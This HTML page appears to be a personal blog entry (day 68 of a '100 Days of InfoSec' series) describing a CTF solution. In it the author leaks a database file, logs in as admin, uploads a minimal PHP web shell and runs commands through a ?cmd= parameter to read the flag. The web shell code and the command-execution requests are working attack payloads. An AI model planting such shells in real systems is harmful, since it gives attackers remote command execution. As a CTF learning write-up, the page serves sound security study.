		.c2 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left;
			height: 11pt
		}

		.c13 {
			color: #434343;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Montserrat";
			font-style: normal
		}

		.c0 {
			color: #000000;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Montserrat";
			font-style: normal
		}

		.c8 {
			color: #000000;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 11pt;
			font-family: "Arial";
			font-style: normal
		}

		.c9 {
			padding-top: 14pt;
			text-indent: 36pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: right
		}

		.c3 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c5 {
			padding-top: 14pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c4 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: center
		}

		.c10 {
			font-size: 18pt;
			font-family: "Montserrat";
			color: #000000;
			font-weight: 900
		}

		.c11 {
			background-color: #ffffff;
			max-width: 600pt;
			padding: 72pt 72pt 72pt 72pt;
			margin: auto;
		}

		.c12 {
			font-size: 14pt;
			font-family: "Roboto Mono";
			font-weight: 300
		}

		.c16 {
			font-family: "Montserrat";
			color: #000000;
			font-weight: 800
		}

		.c15 {
			font-size: 14pt;
			font-family: "Montserrat";
			font-weight: 400
		}

		.c7 {
			color: inherit;
			text-decoration: inherit
		}

		.c14 {
			text-indent: 36pt
		}

		.c17 {
			height: 14pt
		}

		.title {
			padding-top: 0pt;
			color: #000000;
			font-size: 26pt;
			padding-bottom: 3pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.subtitle {
			padding-top: 0pt;
			color: #666666;
			font-size: 15pt;
			padding-bottom: 16pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		li {
			color: #000000;
			font-size: 11pt;
			font-family: "Arial"
		}

		p {
			margin: 0;
			color: #000000;
			font-size: 11pt;
			font-family: "Arial"
		}

		h1 {
			padding-top: 20pt;
			color: #000000;
			font-size: 20pt;
			padding-bottom: 6pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h2 {
			padding-top: 18pt;
			color: #000000;
			font-size: 16pt;
			padding-bottom: 6pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h3 {
			padding-top: 16pt;
			color: #434343;
			font-size: 14pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h4 {
			padding-top: 14pt;
			color: #666666;
			font-size: 12pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h5 {
			padding-top: 12pt;
			color: #666666;
			font-size: 11pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h6 {
			padding-top: 12pt;
			color: #666666;
			font-size: 11pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			font-style: italic;
			orphans: 2;
			widows: 2;
			text-align: left
		}
	</style>
</head>

<body class="c11">
	<h3 class="c9" id="h.3zvpwyx0el37"><span class="c10">68<br></span><span
			class="c10">/<br>100<br>Days<br>Of<br>InfoSec</span>
		<hr>
	</h3>
	<h3 class="c5" id="h.uhn6dzi5itr4"><span class="c16">CTFd &mdash; &nbsp;go here 4 shell (part 2) </span></h3>
	<p class="c2"><span class="c8"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c0">So far :</span></p>
	<p class="c3"><span class="c0">I have the source for login.php and admin.php</span></p>
	<p class="c3"><span class="c0">SQL injection and brute force attacks haven&rsquo;t got me anywhere</span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c0">In the Login source there&rsquo;s a mention of db.sql database so I think of how I
			can leak the database. I try the following :</span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c1"></span></p>
	<p class="c3"><span class="c1">?page=dg.sql</span></p>
	<p class="c3"><span class="c12">?file=dg.sql</span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c0">But I realized the parser is going to add .php to the file name so that would not
			work. </span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c0">Can I just use /login.php to go to the page? </span></p>
	<p class="c3"><span class="c0">Yes I can!</span></p>
	<p class="c3"><span class="c0">Can I just request for the database like that?</span></p>
	<p class="c3"><span class="c0">Yes that worked!</span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c1">/dg.sql</span></p>
	<p class="c2"><span class="c1"></span></p>
	<p class="c2"><span class="c1"></span></p>
	<p class="c3"><span class="c0">It was that simple? I kinda felt sad that it took so long</span></p>
	<p class="c3"><span class="c0">Anyway, so I have the database now which revealed the admin password</span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 723.50px; height: 434.64px;"><img
				alt="" src="images/image2day68.png"
				style="width: 1038.01px; height: 650.61px; margin-left: -157.93px; margin-top: -71.54px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c0">Logged in as admin and now there&rsquo;s an upload page like I could see in the
			source. </span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 767.50px; height: 237.38px;"><img
				alt="" src="images/image1day68.png"
				style="width: 767.50px; height: 480.92px; margin-left: 0.00px; margin-top: -73.80px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c15">I uploaded a .JPEG which could then be viewed by clicking its </span><span
			class="c12">&lt;a href&gt; name &lt;/a&gt;.</span><span class="c0">&nbsp;Then I tried uploading a .txt file
			with the following payloads : </span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c1">echo &#39;does this work&#39; &gt; temp.txt</span></p>
	<p class="c2"><span class="c1"></span></p>
	<p class="c3"><span class="c1">echo &#39;&lt;?php passthru($_GET[&quot;cmd&quot;]); ?&gt;&#39; &gt; shell.php</span>
	</p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c0">Didn&rsquo;t work, so then I just uploaded a .php file with a shell payload directly
			as cmd.php : </span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c1">&lt;?php</span></p>
	<p class="c3 c14"><span class="c1">$cmd=$_GET[&#39;cmd&#39;];</span></p>
	<p class="c3 c14"><span class="c1">system($cmd)</span></p>
	<p class="c3"><span class="c1">?&gt;</span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c0">But I took a precaution to change the content-type of the POST request in Burp from
			text/php to image/jpeg (later I figured it didn&rsquo;t matter and the exploit worked even without doing
			that)</span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 774.50px; height: 485.30px;"><img
				alt="" src="images/image3day68.png"
				style="width: 774.50px; height: 485.30px; margin-left: 0.00px; margin-top: 0.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c0">Gave it the following parameter :</span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c1">?cmd=pwd</span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c0">And I got a command execution! Home stretch! </span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c1">?cmd=cat%20/flag.txt</span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c12">Flag : flag{ch3ck_ur_3xt3n510ns_k1ds_ce605acb45e1}</span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c3"><span class="c15">(Helpful links - </span><span class="c6"><a class="c7"
				href="https://www.google.com/url?q=https://berzerk0.github.io/GitPage/CTF-Writeups/ZorZ-Vulnhub.html&amp;sa=D&amp;ust=1585191651711000">this</a></span><span
			class="c15">&nbsp;and </span><span class="c6"><a class="c7"
				href="https://www.google.com/url?q=https://resources.infosecinstitute.com/php-lab-file-upload-vulnerabilities/&amp;sa=D&amp;ust=1585191651712000">this</a></span><span
			class="c15">)</span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<h3 class="c5 c17" id="h.dardaoz37s2v"><span class="c13"></span></h3>
	<hr>
	<p class="c4"><span class="c0">
		<a href='/100days/day67.html'>Previous</a>
			&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href='/100days/'>Home</a>
			&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href='/100days/day69.html'>Next</a>
	</span>
	</p>
</body>

</html>